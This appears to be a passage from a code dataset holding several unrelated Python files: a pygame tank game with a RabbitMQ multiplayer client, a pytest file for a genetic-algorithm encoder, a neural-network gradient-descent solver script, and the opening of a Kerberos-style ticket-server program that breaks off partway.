self.color = color\r\n self.width = 31\r\n self.direction = Direction.RIGHT\r\n\r\n self.KEY = {d_right: Direction.RIGHT, d_left: Direction.LEFT,\r\n d_up: Direction.UP, d_down: Direction.DOWN}\r\n self.KEYPULL=d_pull\r\n def draw(self):\r\n tank_c = (self.x + int(self.width / 2), self.y + int(self.width / 2))\r\n pygame.draw.rect(screen, self.color, \r\n (self.x, self.y, self.width, self.width), 6)\r\n pygame.draw.circle(screen, self.color, tank_c, int(self.width / 3))\r\n\r\n if self.direction == Direction.RIGHT:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + self.width + int(self.width / 2), self.y + int(self.width / 2)), 4)\r\n if self.direction == Direction.LEFT:\r\n pygame.draw.line(screen, self.color, tank_c, (\r\n self.x - int(self.width / 2), self.y + int(self.width / 2)), 4)\r\n if self.direction == Direction.UP:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + int(self.width / 2), self.y - int(self.width / 2)), 4)\r\n if self.direction == Direction.DOWN:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + int(self.width / 2), self.y + self.width + int(self.width / 2)), 4)\r\n\r\n def change_direction(self, direction):\r\n self.direction = direction\r\n \r\n def move(self):\r\n if self.direction == Direction.LEFT:\r\n self.x -= self.speed\r\n if self.direction == Direction.RIGHT:\r\n self.x += self.speed\r\n if self.direction == Direction.UP:\r\n self.y -= self.speed\r\n if self.direction == Direction.DOWN:\r\n self.y += self.speed\r\n \r\n if self.y <0:\r\n self.y = height\r\n if self.y > height:\r\n self.y = 0\r\n if self.x < 0:\r\n self.x = width\r\n if self.x > width:\r\n self.x = 0\r\n self.draw()\r\n\r\nFPS = 50\r\nclock = pygame.time.Clock()\r\n\r\nclass Shot:\r\n def __init__(self,x=0,y=0,color=(0,0,0),direction=Direction.LEFT,speed=12):\r\n self.x=x\r\n self.y=y\r\n self.color=color\r\n self.speed=speed\r\n self.direction=direction\r\n self.status=True\r\n self.distance=0\r\n self.radius=5\r\n \r\n def move(self):\r\n if self.direction == Direction.LEFT:\r\n self.x -= self.speed\r\n if self.direction == Direction.RIGHT:\r\n self.x += self.speed\r\n if self.direction == Direction.UP:\r\n self.y -= self.speed\r\n if self.direction == Direction.DOWN:\r\n self.y += self.speed\r\n self.distance+=1\r\n if self.distance>(2*width):\r\n self.status=False\r\n self.draw()\r\n\r\n def draw(self):\r\n if self.status:\r\n pygame.draw.circle(screen,self.color,(self.x,self.y),self.radius)\r\n\r\ndef give_coordinates(tank):\r\n if tank.direction == Direction.RIGHT:\r\n x=tank.x + tank.width + int(tank.width / 2)\r\n y=tank.y + int(tank.width / 2)\r\n\r\n if tank.direction == Direction.LEFT:\r\n x=tank.x - int(tank.width / 2)\r\n y=tank.y + int(tank.width / 2)\r\n\r\n if tank.direction == Direction.UP:\r\n x=tank.x + int(tank.width / 2)\r\n y=tank.y - int(tank.width / 2)\r\n\r\n if tank.direction == Direction.DOWN:\r\n x=tank.x + int(tank.width / 2)\r\n y=tank.y + tank.width + int(tank.width / 2)\r\n\r\n p=Shot(x,y,tank.color,tank.direction)\r\n shot.append(p)\r\n\r\nclass Booster:\r\n def __init__(self):\r\n self.x = random.randint(100,800)\r\n self.y = random.randint(100,600)\r\n self.radius = 30\r\n self.status = True\r\n def draw(self):\r\n if self.status: \r\n screen.blit(boosterIMG ,(self.x, self.y))\r\n\r\nclass Wall:\r\n def __init__(self):\r\n self.x = random.randint(100,800)\r\n self.y = random.randint(100,600)\r\n self.width = 10\r\n self.height = 10\r\n self.status = True\r\n\r\n def draw(self):\r\n if self.status:\r\n 
screen.blit(wallImage,(self.x, self.y))\r\n\r\ndef collision():\r\n    for p in shot:\r\n        for tank in tanks:\r\n            if (tank.x+tank.width+p.radius > p.x > tank.x - p.radius ) and ((tank.y+tank.width + p.radius > p.y > tank.y - p.radius)) and p.status==True:\r\n                explosionSound.play()\r\n                p.color=(0,0,0)\r\n                tank.life -=1\r\n                p.status=False\r\n                \r\n                tank.x=random.randint(50,width-70)\r\n                tank.y=random.randint(50,height-70)\r\n\r\ndef life():\r\n    life1=tanks[0].life\r\n    life2=tanks[1].life\r\n    res = bont.render(\"1's Player's Life: \" + str(life1), True, (255, 123, 100))\r\n    res1 = bont.render(\"2's Player's Life: \" + str(life2), True, (100, 230, 40))\r\n    screen.blit(res, (40,70))\r\n    screen.blit(res1, (420,70))\r\n\r\ntank1 = Tank(1, 50, 50, 3, (240, 240, 0), pygame.K_d, pygame.K_a, pygame.K_w, pygame.K_s, pygame.K_SPACE)\r\ntank2 = Tank(2, 700, 500 ,3, (200, 0, 200), pygame.K_RIGHT, pygame.K_LEFT, pygame.K_UP, pygame.K_DOWN, pygame.K_RETURN)\r\n\r\nmap= [Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall()]\r\ntanks = [tank1, tank2]\r\nshot = []\r\nbooster0 = Booster()\r\nboosters = [booster0]\r\n\r\ndef mainpage():\r\n    wallpaper = pygame.image.load('img/wallpaper.png')\r\n    screen = pygame.display.set_mode((width, height))\r\n    pygame.display.set_caption(\"Choose Your Hero!\")\r\n    screen.blit(wallpaper, (0, 0))\r\n    screen.blit(font.render(\"press Enter to play duel \", 1, (255,255,255)), font.render(\"press Enter to play duel \", 1, (0,0,0)).get_rect(center = (420,200)))\r\n    screen.blit(font.render(\"press Space to play multiplayer \", 1, (255,255,255)), font.render(\"press Space to play multiplayer \", 1, (0,0,0)).get_rect(center = (500,300)))\r\n    screen.blit(font.render(\"press Ctrl to play AI mode\", 1, (255,255,255)), font.render(\"press Ctrl to play AI mode\", 1, (0,0,0)).get_rect(center = (450,400)))\r\n    screen.blit(font.render(\"press Esc to quit\", 1, (255,255,255)), font.render(\"press Esc to quit\", 1, (0,0,0)).get_rect(center = (470,500)))\r\n    pygame.display.flip()\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            quit() \r\n        if event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_ESCAPE: \r\n                quit() \r\n        if event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_RETURN:\r\n                duel()\r\n            if event.key == pygame.K_SPACE:\r\n                multiplayer()\r\n            if event.key == pygame.K_LCTRL:\r\n                AImode()\r\n\r\ndef duel():\r\n    start_time = None\r\n    clock = pygame.time.Clock()\r\n    font = pygame.font.SysFont('Courier New', 40)\r\n    mainloop = True\r\n    lifely = True\r\n    time1 = 0\r\n    time2 = 0\r\n    timer1 = False\r\n    timer2 = False\r\n    while mainloop:\r\n        mills = clock.tick(FPS)\r\n        if lifely:\r\n            start_time = pygame.time.get_ticks()\r\n        screen = pygame.display.set_mode((width, height))\r\n        pygame.display.set_caption(\"DUEL\")\r\n        screen.fill((127,255,212))\r\n        background = pygame.Surface((200,700))\r\n        screen.blit(background,(800,0))\r\n        life()\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                quit() \r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_ESCAPE:\r\n                    quit()\r\n                pressed = pygame.key.get_pressed()\r\n                start_time = pygame.time.get_ticks()\r\n                for tank in tanks:\r\n                    if event.key in tank.KEY.keys():\r\n                        tank.change_direction(tank.KEY[event.key])\r\n                    if event.key in tank.KEY.keys():\r\n                        tank.move()\r\n                    if pressed[tank.KEYPULL]:\r\n                        shotSound.play()\r\n                        give_coordinates(tank)\r\n\r\n        \r\n        for p in shot:\r\n            for tank in tanks:\r\n                if (tank.x+tank.width+p.radius > p.x > tank.x - p.radius 
) and ((tank.y+tank.width + p.radius > p.y > tank.y - p.radius)) and p.status==True:\r\n                explosionSound.play()\r\n                p.color=(0,0,0)\r\n                tank.life -= 1\r\n                p.status=False\r\n                tank.x=random.randint(50,width-50)\r\n                tank.y=random.randint(50,height-50)\r\n                if tank.life == 0:\r\n                    font = pygame.font.SysFont(\"Times New Roman\", 70) \r\n                    text = font.render(\"GG WP\", 1, (0,0,0)) \r\n                    place = text.get_rect(center = (400,100)) \r\n                    screen.blit(text, place) \r\n                    tank1.speed = 0\r\n                    tank2.speed = 0\r\n                    lifely = False\r\n        \r\n        if start_time:\r\n            time_since_enter = ((pygame.time.get_ticks() - start_time)/1000)\r\n            message = 'Seconds since enter: ' + str(time_since_enter)\r\n            screen.blit(font.render(message, True, (255,255,255)), (20, 20))\r\n        \r\n        \r\n        for wall in map:\r\n            for tank in tanks:\r\n                if (wall.x + wall.height > tank.x + 9 > wall.x - tank.width) and (wall.y + wall.width> tank.y + 9> wall.y) and wall.status==True:\r\n                    explosionSound.play()\r\n                    wall.color=(0,0,0)\r\n                    tank.life -= 1\r\n                    wall.status=False\r\n                    if tank.life == 0:\r\n                        font = pygame.font.SysFont(\"Times New Roman\", 70) \r\n                        text = font.render(\"GG WP\", 1, (0,0,0)) \r\n                        place = text.get_rect(center = (400,60)) \r\n                        screen.blit(text, place) \r\n                        tank1.speed = 0\r\n                        tank2.speed = 0\r\n                        lifely = False\r\n\r\n\r\n\r\n        for p in shot:\r\n            for wall in map:\r\n                if (wall.x + wall.height> p.x > wall.x ) and (wall.y + wall.width> p.y > wall.y) and p.status==True and wall.status == True:\r\n                    explosionSound.play()\r\n                    p.color=(0,0,0)\r\n                    p.status=False\r\n                    wall.status = False\r\n\r\n        if (booster0.x + booster0.radius > tank1.x + 9 > booster0.x ) and (booster0.y + booster0.radius> tank1.y + 9 > booster0.y) and booster0.status == True:\r\n            booster0.status = False\r\n            timer1 = True\r\n        if (booster0.x + booster0.radius > tank2.x + 9 > booster0.x ) and (booster0.y + booster0.radius> tank2.y + 9 >booster0.y) and booster0.status == True:\r\n            booster0.status = False\r\n            timer2 = True\r\n        if timer1:\r\n            time1 = time1 + (mills / 1000)\r\n        if timer2:\r\n            time2 = time2 + (mills / 1000)\r\n        if time1 < 5 and time1 != 0:\r\n            if lifely:\r\n                tank1.speed = 4\r\n            l0 = 5 - time1\r\n            scor = \"%.2f\" % l0 \r\n            text = font.render(scor, 1, (0, 191,255)) \r\n            screen.blit(text, (930,500)) \r\n        elif time2 < 5 and time2 != 0:\r\n            if lifely:\r\n                tank2.speed = 4\r\n            l0 = 5 - time2\r\n            scor = \"%.2f\" % l0 \r\n            text = font.render(scor, 1, (255, 0, 0)) \r\n            screen.blit(text, (930,290))\r\n        else:\r\n            if lifely:\r\n                tank1.speed = 2\r\n                tank2.speed = 2\r\n            booster0.status = True\r\n            timer1 = False\r\n            time1 = 0\r\n            timer2 = False\r\n            time2 = 0\r\n        \r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                mainloop = False\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_ESCAPE:\r\n                    mainloop = False\r\n        \r\n        for p in shot:\r\n            p.move()\r\n        for tank in tanks:\r\n            tank.draw()\r\n            tank.move()\r\n        for wall in map:\r\n            wall.draw()\r\n        for booster in boosters:\r\n            booster.draw() \r\n\r\n        pygame.display.flip()\r\n\r\n#multiplayer\r\nclass TankRPCproducer:\r\n    def __init__(self):\r\n        self.connection = pika.BlockingConnection(\r\n            pika.ConnectionParameters(\r\n                host = IP,\r\n                port = PORT,\r\n                virtual_host = VIRTUAL_HOST,\r\n                credentials = pika.PlainCredentials(\r\n                    username = USERNAME,\r\n                    password = PASSWORD\r\n                )\r\n            )\r\n        )\r\n        self.channel = self.connection.channel()\r\n\r\n        result = self.channel.queue_declare(queue = '', auto_delete = True, exclusive = True)\r\n        self.queue_callback = result.method.queue\r\n\r\n        self.channel.queue_bind(exchange = 
'X:routing.topic',\r\n                                queue = self.queue_callback)\r\n\r\n        self.channel.basic_consume(\r\n            queue = self.queue_callback,\r\n            on_message_callback = self.callback,\r\n            auto_ack = True\r\n        )\r\n        self.response = None\r\n        self.corr_id = None\r\n        self.token = None\r\n        self.tankid = None\r\n        self.roomid = None\r\n        \r\n    def call(self, rout_key, message = {}):\r\n        self.response = None\r\n        self.corr_id = str(uuid.uuid4())\r\n        self.channel.basic_publish(\r\n            exchange = 'X:routing.topic',\r\n            routing_key = rout_key,\r\n            properties = pika.BasicProperties(\r\n                reply_to = self.queue_callback,\r\n                correlation_id = self.corr_id,\r\n            ),\r\n            body=json.dumps(message)\r\n        )   \r\n        while self.response is None:\r\n            self.connection.process_data_events()\r\n\r\n    def callback(self, ch, method, properties, body):\r\n        if self.corr_id == properties.correlation_id:\r\n            self.response = json.loads(body)\r\n            print(self.response)\r\n\r\n    def health_check(self):\r\n        self.call('tank.request.healthcheck')\r\n        if self.response['status'] == '200':\r\n            return True\r\n        return False\r\n\r\n    def register(self, room_id):\r\n        message = {\r\n            'roomId': room_id\r\n        }\r\n        self.call('tank.request.register', message)\r\n        if 'token' in self.response:\r\n            self.token = self.response['token']\r\n            self.tankid = self.response['tankId']\r\n            \r\n            return True\r\n        return False\r\n        \r\n    def turn_tank(self, token, direction):\r\n        message = {\r\n            'token': token,\r\n            'direction': direction\r\n        }\r\n        self.call('tank.request.turn', message)\r\n\r\n    def fire_bullet(self, token):\r\n        message = {\r\n            'token': token\r\n        }\r\n        self.call('tank.request.fire', message)\r\n        \r\nclass TankConsumerClient(Thread):\r\n    def __init__(self, room_id):\r\n        super().__init__()\r\n        self.connection = pika.BlockingConnection(\r\n            pika.ConnectionParameters(\r\n                host = IP,\r\n                port = PORT,\r\n                virtual_host = VIRTUAL_HOST,\r\n                credentials = pika.PlainCredentials(\r\n                    username = USERNAME,\r\n                    password = PASSWORD\r\n                )\r\n            )\r\n        )\r\n        self.channel = self.connection.channel()\r\n        queue=self.channel.queue_declare(queue = '',\r\n            auto_delete = True,\r\n            exclusive = True\r\n        )\r\n        event_listener = queue.method.queue\r\n        self.channel.queue_bind(exchange='X:routing.topic',\r\n                        queue=event_listener,\r\n                        routing_key='event.state.'+room_id\r\n                        )\r\n        self.channel.basic_consume(\r\n            queue=event_listener,\r\n            on_message_callback=self.on_response,\r\n            auto_ack=True\r\n        )\r\n        self.response = None\r\n    def on_response(self, ch, method, props, body):\r\n        self.response = json.loads(body)\r\n    def run(self):\r\n        self.channel.start_consuming()\r\n\r\nclass defeated():\r\n    def __init__(self):\r\n        self.state_case = False  \r\n        self.state = False\r\n        self.score = 0\r\n    def loser_display(self):\r\n        def blit_loser():\r\n            pygame.display.set_mode((1100, 600))\r\n            screen.fill((0,0,0))\r\n            fonttext(\"You lose\", 550,180, 40, (255,223,0))\r\n            fonttext(\"To Replay, press [R]\", 550, 280, 30, (255,0,0))\r\n            fonttext('Your Score: ' + str(self.score), 550, 380, 40, (255,0,0))\r\n        defeated_running = True\r\n        while defeated_running:\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    defeated_running = False\r\n                    pygame.quit()\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_ESCAPE:\r\n                        defeated_running = False\r\n                        pygame.quit()\r\n                    if event.key == pygame.K_r:\r\n                        defeated_running = False  \r\n                        mainpage()\r\n                        self.state = False\r\n            blit_loser()\r\n            pygame.display.flip()\r\n\r\nclass victor():\r\n    def __init__(self):\r\n        self.state = False  \r\n        self.score = 0\r\n    def 
winner_display(self):\r\n        def blit_victor():\r\n            pygame.display.set_mode((1100, 600))\r\n            screen.fill((34, 77, 23))  \r\n            fonttext(\"You win!\", 550,180, 40, (255,223,0))\r\n            fonttext(\"To play again, press [R]\", 550, 280, 30, (255,0,0))\r\n            fonttext('Your Score: ' + str(self.score), 550, 380, 30, (255,0,0))\r\n        victory = True\r\n        while victory:\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    victory = False\r\n                    pygame.quit()\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_ESCAPE:\r\n                        victory = False  \r\n                        pygame.quit()\r\n                    if event.key == pygame.K_r:\r\n                        victory = False  \r\n                        mainpage()\r\n                        self.state = False  \r\n            \r\n            blit_victor()\r\n            pygame.display.flip()\r\n\r\nclass afk():\r\n    def __init__(self):\r\n        self.score = 0\r\n        self.state = False  \r\n    def afk_display(self):  \r\n        def afk_blit():\r\n            pygame.display.set_mode((1100, 600))\r\n            screen.fill((0,0,0))\r\n            fonttext('You were kicked', 550,180, 40, (240,255,240))\r\n            fonttext(\"to Replay, press [R]\", 550, 280, 30, (240,255,240))\r\n            fonttext('Your Score: ' + str(self.score), 550, 380, 30, (240,255,240))\r\n        running = True\r\n        while running:\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    running = False\r\n                    quit()\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_ESCAPE:\r\n                        running = False  \r\n                        pygame.quit()\r\n                    if event.key == pygame.K_r:\r\n                        running = False  \r\n                        mainpage()\r\n                        self.state = False  \r\n            afk_blit()\r\n            pygame.display.flip()\r\n\r\nUP = 'UP'\r\nDOWN = 'DOWN'\r\nRIGHT = 'RIGHT'\r\nLEFT = 'LEFT'\r\n\r\nMOVE_KEYS = {\r\n    pygame.K_w: UP,\r\n    pygame.K_a: LEFT,\r\n    pygame.K_d: RIGHT,\r\n    pygame.K_s: DOWN\r\n    }\r\n\r\ndef draw_tanks(x, y, width, height, direction, color_tank):\r\n    tank_center = (x + width // 2, y + height // 2)  \r\n\r\n    pygame.draw.rect(screen, color_tank, (x, y, width, height), 6)\r\n    pygame.draw.circle(screen, color_tank, tank_center, width // 2,4)\r\n    if direction == 'RIGHT':\r\n        pygame.draw.line(screen, color_tank, (tank_center[0] + width // 2,tank_center[1]), (x + width + width // 2, y + height // 2), 4)\r\n    if direction == 'LEFT':\r\n        pygame.draw.line(screen, color_tank, (tank_center[0] - width // 2,tank_center[1]), (x - width // 2, y + height // 2), 4)\r\n    if direction == 'UP':\r\n        pygame.draw.line(screen, color_tank, (tank_center[0],tank_center[1] - width // 2), (x + width // 2, y - height // 2), 4)\r\n    if direction == 'DOWN':\r\n        pygame.draw.line(screen, color_tank, (tank_center[0],tank_center[1] + width // 2), (x + width // 2, y + height + height // 2), 4)\r\n\r\ndef fonttext(text, x, y, size, color):\r\n    font =pygame.font.SysFont('Courier New', size)\r\n    ttext = font.render(text, True, color)\r\n    ttextRect = ttext.get_rect()\r\n    ttextRect.center = (x, y)  \r\n    screen.blit(ttext, ttextRect)\r\n\r\ndef draw_bullets(x, y, width, height, color_bullet):\r\n    pygame.draw.rect(screen, color_bullet,(x, y, width, height))\r\n\r\ndef multiplayer():\r\n    mainloop = True\r\n    screen = pygame.display.set_mode((1000,600))\r\n    r = TankRPCproducer()\r\n    r.health_check()\r\n    r.register('room-7')\r\n    event_collect = TankConsumerClient('room-7')\r\n    event_collect.start()\r\n    while event_collect.response is None:\r\n        pass  # wait for the first game-state message before reading response\r\n    kick = afk()\r\n    winner = victor()\r\n    loser = defeated()\r\n    pygame.display.set_caption(\"Multiplayer\")\r\n    while mainloop:\r\n        pygame.display.set_caption(\"Multiplayer\")\r\n        screen.fill((127,255,212))\r\n        pygame.draw.rect(screen, (51,21,0), (800, 0, 1000, 600))\r\n        tanks = event_collect.response['gameField']['tanks']\r\n        rem_time = 
event_collect.response['remainingTime']\r\n        bullets = event_collect.response['gameField']['bullets']\r\n        losers = event_collect.response['losers']\r\n        winners = event_collect.response['winners']\r\n        kicked = event_collect.response['kicked']\r\n        if rem_time == 1:\r\n            for member in winners:\r\n                if r.tankid == member['tankId']:\r\n                    mainloop = False  \r\n                    winner.state = True\r\n                    winner.score = member['score']\r\n            for member in losers:\r\n                if r.tankid == member['tankId']:\r\n                    mainloop = False  \r\n                    loser.state = True  \r\n                    loser.score = member['score']\r\n        fonttext(\"REQUIEM\", 900, 10, 20, (0, 191,255))\r\n        fonttext(\"You Health Score\", 900, 50, 16, (0, 191,255))\r\n        fonttext(\"ENEMIES\", 900, 120, 20, (255,0,0))\r\n        fonttext(\"Enemies Health Score\", 900, 140, 16, (255,0,0))\r\n        fonttext(\"Time remained: {}\".format(rem_time),100 , 25, 18, (221, 160, 221))\r\n        l = len(tanks) - 1\r\n        f = l\r\n        c_tanks = 0\r\n        t = 0\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                mainloop = False\r\n            if event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_ESCAPE:\r\n                    mainloop = False\r\n                if event.key in MOVE_KEYS:\r\n                    r.turn_tank(r.token, MOVE_KEYS[event.key])\r\n                if event.key == pygame.K_SPACE:\r\n                    r.fire_bullet(r.token)\r\n\r\n        for member in kicked:\r\n            if r.tankid == member['tankId']:  \r\n                kick.state = True  \r\n                kick.score = member['score']\r\n                mainloop = False\r\n        for member in losers:\r\n            if r.tankid == member['tankId']:\r\n                loser.state = True  \r\n                loser.score = member['score']\r\n                mainloop = False\r\n        for member in winners:\r\n            if r.tankid == member['tankId']:  \r\n                winner.state = True\r\n                winner.score = member['score']\r\n                mainloop = False\r\n        try:\r\n            for tank in tanks:\r\n                if r.tankid == tank['id']:\r\n                    draw_tanks(tank['x'], tank['y'], tank['width'],tank['height'], tank['direction'], (0, 191,255))\r\n                else:\r\n                    c_tanks += 1\r\n                    draw_tanks(tank['x'], tank['y'], tank['width'],tank['height'], tank['direction'], (255,0,0))\r\n        except:\r\n            pass\r\n        try:\r\n            for bullet in bullets:\r\n                if r.tankid == bullet['owner']:\r\n                    draw_bullets(bullet['x'], bullet['y'], bullet['width'], bullet['height'], (0, 191,255))\r\n                else:\r\n                    draw_bullets(bullet['x'], bullet['y'], bullet['width'], bullet['height'], (255,0,0))\r\n        except:\r\n            pass  \r\n        try:\r\n            for tank in tanks:\r\n                if r.tankid == tank['id']:  \r\n                    fonttext(tank['id'] + \" \" + str(tank['health']) + \" \" + str(tank['score']), 900,70,17, (0, 191,255))\r\n                else:\r\n                    fonttext(tank['id'] + \" \" + str(tank['health']) + \" \" + str(tank['score']), 900,160 + (20 * t),17, (255,0,0))\r\n                    t = t + 1  \r\n                if f == 0:\r\n                    t = 0\r\n                    f = l\r\n                f = f - 1\r\n            if c_tanks + 1 != len(tanks):\r\n                mainloop = False\r\n                loser.state_case = True\r\n        except:\r\n            pass\r\n        pygame.display.flip()\r\n        \r\n    if kick.state == True:\r\n        kick.afk_display()\r\n    elif winner.state == True:\r\n        winner.winner_display()\r\n    elif loser.state == True:\r\n        loser.loser_display()\r\n    elif loser.state_case == True:\r\n        loser.loser_display()\r\n\r\n    \r\n\r\nwhile True:\r\n    mainpage()\r\n\r\npygame.quit()","repo_name":"Daryn-san/FINALE","sub_path":"19b030301.py","file_name":"19b030301.py","file_ext":"py","file_size_in_byte":26638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3983300288","text":"# Created by Andy at 04-Jan-21\n\n# Enter description here\n\n# ___________________________________\nimport pytest\nfrom hypothesis import strategies as st, given\nimport time\nfrom genetic_algo import *\nfrom 
genetic_algo.ga_tools import quantise, back_to_float\n\ndef test_encoding_decoding(default_solver):\n    default_solver.initialise_population()\n    pop_list = default_solver._current_population\n    for person in pop_list:\n        encoded = quantise(person.x, default_solver.n_encoding_bits, default_solver._upper, default_solver._lower)\n        assert all(len(j) == default_solver.n_encoding_bits+2 for j in encoded)\n        decoded = back_to_float(encoded, default_solver.n_encoding_bits, default_solver._upper, default_solver._lower)\n        assert all(a-b<0.001 for a,b in zip(person.x, decoded))\n\n\n@pytest.fixture(autouse=True)\ndef default_solver():\n    solver = GASolver(obj_fn=rana)\n    yield solver\n    del solver\n\n\n@pytest.fixture(autouse=True)\ndef timer():\n    start = time.time()\n    yield\n    finish = time.time()\n    print(f\"\\n The test finished in {finish - start :.3f} seconds\" )","repo_name":"ajc327/Genetic_Algorithm_Solver","sub_path":"test/test_encoding.py","file_name":"test_encoding.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38604213608","text":"\"\"\"\n# Consider the objective function F(u1,....,uN-1); notice that u0 and uN are given by the boundary\n# conditions and therefore need not be considered. Here F is defined as:\n# sum_i=1^N (partial y/partial x (u_{i-1}) - partial y/partial x (u_i))^2\n# we want to find the minimizer of F, namely u*.\n# what we need to do is compute the values of the 5 derivatives with the NN at each iteration, where the gradient\n# descent scheme is given by u(k+1)=u(k)-grad(F), i.e. for each i, ui(k+1)=ui(k)-partial(F)/partial(ui)\n\"\"\"\nimport numpy as np\nfrom tensorflow.keras.models import load_model\n\n\n# from keras.models import load_model\n\n\ndef udiff(saveArray):\n    return np.linalg.norm(saveArray[-1] - saveArray[-2])\n\n\ndef coarseFunc(u):\n    return u * (Dx1 @ u) - Dx2 @ u - r0\n\n\n# defining the target function; takes DU as input (which contains the different partial derivatives from the NN)\n\n# number of intervals\nN = 10\n\n# boundary condition for the target problem, u(-1)=a, u(1)=b\na = 0.6\nb = -0.8\n\n# a = -0.3\n# b = 1\n#\n# a = 0.8\n# b = 0.2\n\nr0 = np.hstack([a, np.zeros(N - 1), b])\n# step size on coarse grid\nh = 2 / N\n# assigning derivative matrix\nDx1 = np.eye(N + 1, k=1) - np.eye(N + 1, k=-1)\nDx1 = Dx1 / (2 * h)\n# First and last row of Dx1 is zero for applying boundary condition\nDx1[0, :] = np.zeros(N + 1)\nDx1[N, :] = np.zeros(N + 1)\n\nDx2 = np.eye(N + 1, k=1) + np.eye(N + 1, k=-1) - 2 * np.eye(N + 1, k=0)\nDx2 = Dx2 / (2 * h * 2 * h)\n\n# For applying boundary condition\nDx2[0, :] = np.hstack((-1, np.zeros(N)))\nDx2[N, :] = np.hstack((np.zeros(N), -1))\n\n# import model for looping\ndata_x = np.loadtxt('data_x2_10interval.txt', delimiter=',')\ntarget = np.loadtxt('target2_10interval.txt', delimiter=',')\nmodel = load_model('model/model_10intervals.h5')\nN = 10\n\nsol = np.array([0.6, 0.44647016, 0.22890003, -0.03090544, -0.28457717, -0.48797398,\n                -0.62682007, -0.71150875, -0.7596639, -0.78595875, -0.8])\n# sol = np.array([-0.3, -0.19805781, -0.11122511, -0.03186265, 0.04548198, 0.12572309,\n#                 0.21455435, 0.32025255, 0.45737722, 0.65668735, 1.])\n# sol = np.array([0.8, 0.79858638, 0.79590838, 0.79084667, 0.78132081, 0.76353872,\n#                 0.7308424, 0.67236035, 0.57274539, 0.41640301, 0.2])\n\n# initial guess\nu_array = np.empty([N + 1, 1])\nu_iter = np.linspace(a, b, N + 1)[1:-1]\nu_iter = np.copy(sol[1:-1])\nu = np.hstack([a, u_iter, 
b])\nprint(coarseFunc(sol))\n\n# instead of defining function F, we set the stopping criteria as |e_k|=|uk+1-u_k| since then we don't need to compute\n# all partial derivative for every loop\n\ncount = 0\nalpha = 0.001\ntol = 0.0000001\n\n# while np.linalg.norm(u - sol) / np.linalg.norm(sol) > tol:\nwhile count < 100:\n # defining array for storing partial derivative for each loop (since u are different for each loop)\n store = np.zeros([N, 6])\n count = count + 1\n\n for i in range(N):\n store[i, :] = model.predict(np.array([u[i:i + 2]]))\n # store = np.vstack((store, model.predict(np.array([[u[N - 1], u[0]]]))))\n # using the prediction to do the iteration\n # print(count, \"th store\", store)\n\n F = np.linalg.norm(store[0:N - 1, 1] - store[1:N, 0]) ** 2\n print(count)\n print(\"The error of F of last iteration is: \", F)\n # update u[2,N-2],which is the sol except the first two and last two entry\n # the first two corresponding to u[2]\n grad = 2 * (store[0:N - 3, 1] - store[1:N - 2, 0]) * (store[1:N - 2, 4]) + 2 * (\n store[1:N - 2, 5] - store[2:N - 1, 2]) * (store[1:N - 2, 1] - store[2:N - 1, 0]) + 2 * (\n store[2:N - 1, 1] - store[3:N, 0]) * (store[2:N - 1, 3])\n u_iter[1:-1] = u_iter[1:-1] - alpha * grad\n print(store)\n # update the second last and second first entry, i.e. u[1] and u[N-1], where u is the solution\n u_iter[0] = u_iter[0] - alpha * (2 * (store[0, 5] - store[1, 2]) * (store[0, 1] - store[1, 0]) + 2 * (\n store[1, 1] - store[2, 0]) * (store[1, 3]))\n u_iter[-1] = u_iter[-1] - alpha * (2 * (store[N - 3, 1] - store[N - 2, 0]) * (store[N - 2, 4]) + 2 * (\n store[N - 2, 5] - store[N - 1, 2]) * (store[N - 2, 1] - store[N - 1, 0]))\n\n u = np.hstack([a, u_iter, b])\n u_array = np.append(u_array, u)\n # print(u_iter)\n print(\"u: \", u)\n print(\"Error array: \", u - sol)\n print(\"Error with fine grid:\", np.linalg.norm(u - sol) / np.linalg.norm(sol))\n\n# print(count)\nprint(\"end\")\nprint(coarseFunc(u))\n","repo_name":"CheukHinHoJerry/UROP","sub_path":"UROP/gradientdescent.py","file_name":"gradientdescent.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5165902299","text":"#TGS启动后创建两个线程,1.接收 2.发送 接收 得到连接请求后则创建一个线程,用于处理接收操作,接收后再进行处理 发送,直接给AS发送证书\nimport threading\nimport socket\nfrom RSA import getKey\nimport pymysql\nimport tkinter.messagebox as messagebox # 弹窗\nimport RSA as rsa\nimport datetime\nimport des_for_rsa as des\nHOST = '192.168.43.238'\n# HOST= '127.0.0.1'\n\nPORT_TGS = 65433\nPORT_V = 65434\nPORT_AS = 65432\n\nserial_num = 1\n\ndef change_to_bytes(my_uint):\n if my_uint == 0:\n return bytes(1)\n result = my_uint.to_bytes((my_uint.bit_length() + 7) // 8, 'big') # 8位划分,尽量少补零\n return result\n\n# 获取时间戳\ndef get_time():\n start_time = datetime.datetime(2023, 5, 1, 0, 0, 0)\n now = datetime.datetime.now()\n ts = (now - start_time).seconds\n return ts\n\n# ack打包函数,ack只需要传递包头\ndef packet_ack(port, num, type_message, fin,pipei,rongyu):\n my_port = port\n server_port = port\n serial_num = num\n 